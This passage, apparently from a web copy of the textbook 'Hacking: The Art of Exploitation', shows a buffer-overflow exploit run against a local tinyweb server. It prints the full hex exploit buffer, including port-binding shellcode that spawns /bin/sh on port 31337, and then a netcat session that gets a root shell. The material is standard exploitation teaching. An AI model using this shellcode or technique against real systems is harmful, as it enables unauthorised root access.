NETWORKING - Hacking: The Art of Exploitation

Graphics Programs Reference

In-Depth Information

When this exploit is compiled and run against a host running tinyweb

server, the shellcode listens on port 31337 for a TCP connection. In the

output below, a program called nc is used to connect to the shell. This pro-

gram is netcat ( nc for short), which works like that cat program but over the

network. We can't just use telnet to connect since it automatically terminates

all outgoing lines with '\r\n' . The output of this exploit is shown below. The

-vv command-line option passed to netcat is just to make it more verbose.

reader@hacking:~/booksrc $ gcc tinyweb_exploit2.c

reader@hacking:~/booksrc $ ./a.out 127.0.0.1

Exploit buffer:

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................

90 90 90 90 90 90 90 90 90 90 90 90 6a 66 58 99 | ............jfX.

31 db 43 52 6a 01 6a 02 89 e1 cd 80 96 6a 66 58 | 1.CRj.j......jfX

43 52 66 68 7a 69 66 53 89 e1 6a 10 51 56 89 e1 | CRfhzifS..j.QV..

cd 80 b0 66 43 43 53 56 89 e1 cd 80 b0 66 43 52 | ...fCCSV.....fCR

52 56 89 e1 cd 80 93 6a 02 59 b0 3f cd 80 49 79 | RV.....j.Y.?..Iy

f9 b0 0b 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 | ...Rh//shh/bin..

52 89 e2 53 89 e1 cd 80 90 90 90 90 90 90 90 90 | R..S............

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................

90 90 90 90 90 90 90 90 90 90 90 90 88 f6 ff bf | ................

0d 0a | ..

reader@hacking:~/booksrc $ nc -vv 127.0.0.1 31337

localhost [127.0.0.1] 31337 (?) open

whoami

root

ls -l /etc/passwd

-rw-r--r-- 1 root root 1545 Sep 9 16:24 /etc/passwd

Search WWH ::

Custom Search

Home